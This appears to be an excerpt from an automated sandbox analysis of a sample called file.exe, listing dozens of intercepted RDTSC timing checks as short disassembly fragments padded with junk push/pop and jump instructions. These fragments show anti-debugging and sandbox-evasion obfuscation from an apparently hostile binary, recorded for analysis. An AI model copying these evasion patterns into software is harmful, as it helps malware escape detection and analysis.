Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 537035 second address: 53704A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C5Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59EE90 second address: 59EEA2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FD001095A56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A5A5E second address: 5A5A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A5A69 second address: 5A5A73 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD001095A56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A5A73 second address: 5A5A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FD000CC0C56h 0x0000000e ja 00007FD000CC0C56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A5566 second address: 5A5572 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A5572 second address: 5A5594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C5Eh 0x00000007 pushad 0x00000008 jmp 00007FD000CC0C5Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A5594 second address: 5A55BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD001095A56h 0x0000000a jne 00007FD001095A56h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD001095A63h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A58C7 second address: 5A58CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A58CF second address: 5A58F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD001095A65h 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FD001095A56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AE2AA second address: 5AE2B1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AE2B1 second address: 5AE2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jc 00007FD001095A60h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ACE19 second address: 5ACE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD000CC0C56h 0x0000000a popad 0x0000000b pushad 0x0000000c jg 00007FD000CC0C56h 0x00000012 jmp 00007FD000CC0C5Bh 0x00000017 popad 0x00000018 pushad 0x00000019 push edx 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ACE3C second address: 5ACE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD001095A56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ACE48 second address: 5ACE53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ACE53 second address: 5ACE63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jc 00007FD001095A56h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AD136 second address: 5AD13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AD67C second address: 5AD692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD001095A62h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AD692 second address: 5AD6AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AD6AF second address: 5AD6B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ADBE9 second address: 5ADBED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ADBED second address: 5ADBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ADBF3 second address: 5ADC10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FD000CC0C56h 0x00000009 jmp 00007FD000CC0C60h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ACB31 second address: 5ACB4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD001095A62h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ACB4B second address: 5ACB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B4D3A second address: 5B4D59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD001095A65h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B4D59 second address: 5B4D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5760CD second address: 5760D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5760D1 second address: 5760DB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD000CC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576160 second address: 57618D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FD001095A56h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD001095A67h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57618D second address: 576193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576193 second address: 5761EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FD001095A5Ch 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jnp 00007FD001095A5Ah 0x0000001a push edi 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e pop eax 0x0000001f jmp 00007FD001095A61h 0x00000024 call 00007FD001095A59h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jnp 00007FD001095A56h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5761EA second address: 5761EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5761EE second address: 5761F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5761F4 second address: 57623E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD000CC0C5Ch 0x00000008 jg 00007FD000CC0C56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ebx 0x00000012 jmp 00007FD000CC0C5Ah 0x00000017 pop ebx 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jmp 00007FD000CC0C5Ch 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jmp 00007FD000CC0C65h 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57623E second address: 576243 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576300 second address: 576305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5763B2 second address: 5763C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5763C3 second address: 5763C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5769D9 second address: 5769DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5769DD second address: 5769E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5769E1 second address: 5769E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5769E7 second address: 576A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007FD000CC0C62h 0x0000000f nop 0x00000010 jmp 00007FD000CC0C5Eh 0x00000015 push 0000001Eh 0x00000017 mov edx, dword ptr [ebp+122D3AA3h] 0x0000001d jne 00007FD000CC0C5Eh 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 mov bx, 1165h 0x0000002a popad 0x0000002b nop 0x0000002c pushad 0x0000002d jmp 00007FD000CC0C69h 0x00000032 jo 00007FD000CC0C58h 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b push eax 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576A51 second address: 576A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576EA0 second address: 576EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C69h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576EBE second address: 576EC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576EC4 second address: 55D862 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edx, dword ptr [ebp+122D2C83h] 0x00000011 call dword ptr [ebp+122D2B18h] 0x00000017 push edi 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B51A4 second address: 5B51AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B51AC second address: 5B51B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B52D8 second address: 5B52E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B52E1 second address: 5B52E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B52E5 second address: 5B52E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B52E9 second address: 5B52EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B52EF second address: 5B52F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5475 second address: 5B5479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5479 second address: 5B5487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FD001095A56h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5487 second address: 5B549C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C5Bh 0x00000007 jc 00007FD000CC0C56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B549C second address: 5B54AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD001095A5Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B54AF second address: 5B54B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5740 second address: 5B5773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A69h 0x00000007 jmp 00007FD001095A63h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5773 second address: 5B5788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jno 00007FD000CC0C56h 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5788 second address: 5B5793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5793 second address: 5B579D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD000CC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5929 second address: 5B592F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B592F second address: 5B5935 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5935 second address: 5B595C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 js 00007FD001095A81h 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FD001095A63h 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B595C second address: 5B5962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5AC6 second address: 5B5ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BA39C second address: 5BA3A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BA3A0 second address: 5BA3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BA3A9 second address: 5BA3B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BA3B2 second address: 5BA3B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BB1C4 second address: 5BB1CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BB1CA second address: 5BB1D7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD001095A58h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C0564 second address: 5C056A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C056A second address: 5C0579 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C0579 second address: 5C0584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD000CC0C56h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CF4D second address: 52CF8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d jmp 00007FD001095A65h 0x00000012 popad 0x00000013 pushad 0x00000014 ja 00007FD001095A5Ah 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C7313 second address: 5C731F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C77A8 second address: 5C77AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C7902 second address: 5C7919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD000CC0C61h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CA620 second address: 5CA655 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007FD001095A56h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FD001095A61h 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FD001095A56h 0x0000001a jmp 00007FD001095A5Fh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CA655 second address: 5CA659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CA7B0 second address: 5CA7B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D07A0 second address: 5D07AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D07AA second address: 5D07B4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD001095A56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D07B4 second address: 5D07D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FD000CC0C64h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FD000CC0C5Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007FD000CC0C56h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF2E2 second address: 5CF2E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF42A second address: 5CF437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 ja 00007FD000CC0C56h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF437 second address: 5CF44F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD001095A62h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF44F second address: 5CF453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF982 second address: 5CF998 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A5Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jno 00007FD001095A56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF998 second address: 5CF9BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007FD000CC0C65h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF9BA second address: 5CF9C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D04E0 second address: 5D04EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 jnp 00007FD000CC0C5Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D1EF3 second address: 5D1EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
